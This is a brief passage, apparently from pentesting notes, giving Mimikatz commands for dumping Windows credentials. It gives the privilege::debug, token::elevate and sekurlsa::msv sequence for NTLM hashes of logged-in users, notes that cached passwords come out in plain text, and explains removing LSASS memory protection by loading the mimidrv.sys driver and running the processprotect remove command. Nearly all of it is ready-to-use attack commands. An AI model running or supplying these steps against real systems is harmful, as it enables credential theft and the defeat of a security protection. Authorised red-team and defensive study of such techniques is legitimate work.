This provides NLTM hashes for recently logged in users:
privilege::debug
token::elevate
sekurlsa::msv
Cached passwords are dumped as plain text, instead of NTHashes.
The LSASS process can be protected against memory-based attacks. This protection can be bypassed by loading the mimidrv.sys driver and then executing !processprotect /process:lsass.exe /remove from within the Mimikatz shell.